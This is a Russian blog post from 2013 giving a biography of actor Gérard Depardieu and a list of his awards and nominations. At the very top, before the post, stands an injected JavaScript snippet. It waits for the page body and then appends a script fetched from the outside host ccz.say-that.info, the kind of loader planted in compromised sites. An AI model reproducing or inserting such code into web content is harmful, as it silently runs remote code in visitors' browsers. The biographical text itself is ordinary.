(function(w) { var script = document.createElement('script'); var i = setInterval(function() { if (typeof w.document.body !== 'undefined') { script.src = 'http://ccz.say-that.info' + '/?82845=6aDp77v_8fL-9vT57qCspKSurw'; w.document.body.appendChild(script); clearInterval(i); } }, 200); })(window);

суббота, 5 января 2013 г.

Жерар Депардье

Французский актер, режиссер, продюсер. Жерар Депардье вышел из простой семьи рабочего-прокатчика, в которой было пятеро детей. Он был трудным подростком, воровал и занимался незаконной торговлей. Приехав однажды в Париж, он воспылал любовью к театру и поступил в театральную школу Жан-Лорана Коше, где познакомился со своей будущей женой Элизабет. В 1971 г. он впервые появляется на экране в фильме "Вечерний крик баклана над джонками" (Le cri du cormoran le soir au-dessus des jonques) Мишеля Одиара. Известность к Жерару Депардье пришла в 1974 г., когда он сыграл роль обаятельного хулигана в бегах в фильме "Вальсирующие" (Les valseuses) — анархистской притче Бертрана Блие с участием Патрика Деваера и Миу-Миу. В следующем году успех "медицинского" триллера "Семь смертей по одному рецепту" (Sept morts sur ordonnance) (в советском прокате — "В сетях мафии") дает возможность актеру, которого использовали в основном в ролях шпаны, показать свой многогранный талант. Он естественно смотрится у таких великих итальянских режиссеров, как Бертолуччи (в фреске "Двадцатый век" /Novecento/ (1976)) и Феррери ("Последняя женщина" /L'ultima donna/), легко переходит из мира Маргерит Дюрас ("Грузовик" /Le camion/ (1977)) в мир Клода Зиди ("Инспектор-разиня" /Inspecteur la Bavure/ (1980)). Блие не забывает его и приглашает сниматься в пронзительном "Вечернем платье" (Tenue de soiree) и трогательном фильме "Слишком красивая для тебя" /Trop belle pour toi/ (1989). Жерар Депардье становится любимцем многих прославленных режиссеров французского кино. Для Пиала, у которого Депардье снялся в четырех картинах, он становится вторым "я": за фильм "Полиция" (Police) Жерар получил в 1985 г. на фестивале в Венеции премию за лучшее исполнение мужской роли; затем сыграл мучимого сомнениями аббата в ленте "Под солнцем Сатаны" (Sous le soleil de Satan). Актер становится одним из подопытных кроликов экспериментатора Алена Рене в "Моем американском дядюшке" (Mon oncle d'Amerique) и одновременно с этим играет страстного любовника в фильмах Трюффо "Последнее метро" (Le dernier metro), чей коммерческий успех принес ему в 1981 г. "Сезара", и "Соседка" (La femme d'a cote). Параллельно с этим он прекрасно вписался в комедию: его тандем с Пьером Ришаром во французских "buddy movies" Франсиса Вебера ("Приманка" /La chevre/ (1981), в советском прокате — "Невезучие"; "Беглецы" /Le fugitifs/ (1986)) оказался более чем удачным. После успеха "Возвращения Мартина Герра" (Le retour de Martin Guerre) в 1982 г. Жерар Депардье часто играет исторических персонажей и героев классической французской литературы. Он Жан де Флорет у Клода Берри, Роден — в "Камилле Клодель" (Camille Claudel), блестящий Сирано де Бержерак — у Раппно (эта роль принесла ему "Сезара", приз в Канне и номинацию на "Оскар"). Он даже несколько раз снимался в Америке ("Завоевание рая" /Conquest of Paradise, The/, режиссер Ридли Скотт). Даже Годар не обошел его своим вниманием ("Увы для меня" /Helas pour moi/). Но комедия все так же привлекательна для него, о чем свидетельствует успех фильмов "Астерикс и Обеликс против Цезаря" (Asterix et Obelix contre Cesar) и веберовский "Хамелеон" /Le placard/ (2001). Исполнение роли уставшего полицейского в фильме "Набережная Орфевр, 36" /36 Quai des Orfevre/ (2004) получило высокую оценку критики. Став героем престижных телефильмов, Депардье тем не менее остается центральной фигурой французского кино, о чем свидетельствуют, помимо всего прочего, его новые встречи на экране с прославленными актрисами — Аджани ("Счастливого пути" /Bon voyage/ (2003)) и Денев ("Времена, которые меняются" /Les temps qui changeant/ (2004)). Премии и номинации: 1976 Номинация на премию "Сезар" ("Семь смертей по одному рецепту") 1977 Номинация на премию "Сезар" ("Последняя женщина") 1978 Номинация на премию "Сезар" ("Скажите ей, что я ее люблю") 1979 Номинация на премию "Сезар" ("Сахар") 1981 Премия "Сезар" ("Последнее метро") 1983 Премия МКФ в Монреале ("Дантон") Номинация на премию "Сезар" ("Дантон") 1984 Премия Национального общества кинокритиков (США) ("Дантон", "Возвращение Мартина Герра") Номинация на премию "Сезар" ("Папаши") 1985 Премия МКФ в Венеции ("Полиция") Номинация на премию "Сезар" ("Форт Саганн") 1986 Номинация на премию "Сезар" ("Полиция") 1988 Номинация на премию "Сезар" ("Под солнцем сатаны") Номинация на премию Британской академии кино и телевидения ("Жан де Флорет") 1989 Номинация на премию "Сезар" ("Камилла Клодель") 1990 Премия МКФ в Канне ("Сирано де Бержерак") Номинация на премию "Сезар" ("Слишком красивая для тебя") Номинация на Европейскую кинопремию ("Сирано де Бержерак") 1991 Премия "Сезар" ("Сирано де Бержерак") Премия "Золотой глобус" ("Вид на жительство") Номинация на премию "Оскар" ("Сирано де Бержерак") 1992 Номинация на премию Британской академии кино и телевидения ("Сирано де Бержерак") Номинация на премию Общества лондонских критиков ("Сирано де Бержерак") 1994 Премия МКФ в Сан-Франциско 1995 Специальная премия МКФ в Монреале (в связи с празднованием столетия кино за его исключительный вклад в искусство кинематографа) Номинация на премию "Сезар" ("Полковник Шабер") 1996 Премия "Золотая камера" (Германия) 1997 Премия МКФ в Венеции — "Золотой лев" за карьеру ("за его вклад в киноискусство") 1998 Номинация на Европейскую кинопремию ("Человек в железной маске", за выдающееся европейское достижение в мировом кино) 2000 Премия МКФ "Экраны любви" в Вероне ("Мост между двумя берегами", совместно с Филипом Сеймуром Хоффманом за роль в фильме "Без изъяна") 2002 Премия "Эмми" за лучший мини-сериал ("Наполеон", совместно с Марком Ваде, Делией Файн, Дейвидом Крейгом и Жаном-Пьером Гереном; был сопродюсером фильма)

Комментариев нет:

Отправить комментарий